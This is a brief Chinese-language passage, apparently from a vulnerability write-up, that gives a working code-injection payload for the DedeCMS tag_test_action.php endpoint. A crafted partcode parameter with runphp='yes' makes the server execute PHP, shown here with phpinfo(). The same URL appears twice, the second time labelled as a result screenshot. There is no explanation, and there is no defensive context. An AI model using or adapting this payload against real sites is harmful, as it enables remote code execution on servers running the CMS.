1、payload如下:
1 | http://localhost/dede/tag_test_action.php?url=a&token=&partcode={dede:mochazz name='source' runphp='yes'}phpinfo();{/dede:mochazz} |
2、效果图:
1 | http://localhost/dede/tag_test_action.php?url=a&token=&partcode={dede:mochazz name='source' runphp='yes'}phpinfo();{/dede:mochazz} |